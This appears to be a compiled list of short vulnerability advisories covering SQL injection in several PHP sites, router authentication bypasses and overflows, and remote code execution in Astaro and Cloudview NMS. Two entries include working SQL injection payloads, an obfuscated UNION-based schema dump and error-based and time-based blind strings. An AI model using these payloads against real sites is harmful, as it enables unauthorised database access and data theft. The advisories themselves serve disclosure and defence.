The vulnerability allows an attacker to inject sql commands into the 'femail' parameter of the 'login.php' script, which is not properly sanitized before being used in a SQL query.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?view=product&id=[SQL] http://localhost/[PATH]/index.php?view=products&id=[SQL] -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially crafted requests to the management console. The bug is exploitable remotely when the router is configured to expose the management console. The router is not validating the session token while returning answers for some methods in url '/api'. An attacker can use this vulnerability to retrieve sensitive information such as private/public IP addresses, SSID names, and passwords.
This exploit allows an attacker to upload custom firmware to a device by accessing an ethernet port. This is possible because the system recovery service is started and available for a few seconds after restart. The attacker can use a wget command to check if the system is vulnerable and then use a curl command to upload the custom firmware.
A stack overflow vulnerability exists in the hnap protocol implementation of D-Link routers. An attacker can send a specially crafted request to the router, which can overflow the stack and execute any sh commands under root privileges.
The phpcgi is responsible for processing requests to .php, .asp and .txt pages. An attacker can craft a request in a proper way to bypass authorization and execute a script that returns a login and password to a router.
SQL injection on [idvalue] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/review-details.php?idvalue=9 and sleep(5). Parameter: idvalue (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a). Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: idvalue=90 AND SLEEP(5)
SQL injection on [view] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
This exploit allows an unauthenticated attacker to execute arbitrary code on Astaro Security Gateway v7. It works by sending two requests to the vulnerable server. The first request clears the cache and the second request triggers a reverse connection to the attacker's machine. The attacker's machine then sends a Perl script to the vulnerable server which creates a socket and allows the attacker to execute arbitrary code.
This module exploits a vulnerability found in Cloudview NMS server. The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context 'SYSTEM'.
Services By CQR